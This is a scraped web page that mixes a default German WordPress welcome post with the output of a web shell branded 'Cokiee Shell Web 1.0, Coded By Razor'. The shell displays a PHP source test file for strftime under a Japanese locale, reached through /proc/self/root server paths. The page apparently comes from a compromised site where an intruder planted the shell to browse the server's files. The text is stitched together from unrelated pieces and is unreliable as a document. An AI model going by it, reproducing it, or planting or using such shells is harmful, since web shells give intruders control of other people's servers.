Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/date/tests/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/date/tests/bug65184.phpt |
--TEST-- Test bug #65184 strftime() returns insufficient-length string under multibyte locales --SKIPIF-- <?php if (strtoupper(substr(PHP_OS, 0, 3)) != 'WIN') { die("skip Test is valid for Windows"); } ?> --INI-- date.timezone = UTC --FILE-- <?php setlocale(LC_ALL, 'Japanese_Japan.932'); /* timestamp has to be some wednesday */ $s = strftime('%A', 1372884126); for ($i = 0; $i < strlen($s); $i++) { printf("%x ", ord($s[$i])); } echo "\n"; echo strlen(strftime('%A')), "\n"; ?> ===DONE=== --EXPECT-- 90 85 97 6a 93 fa 6 ===DONE===
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare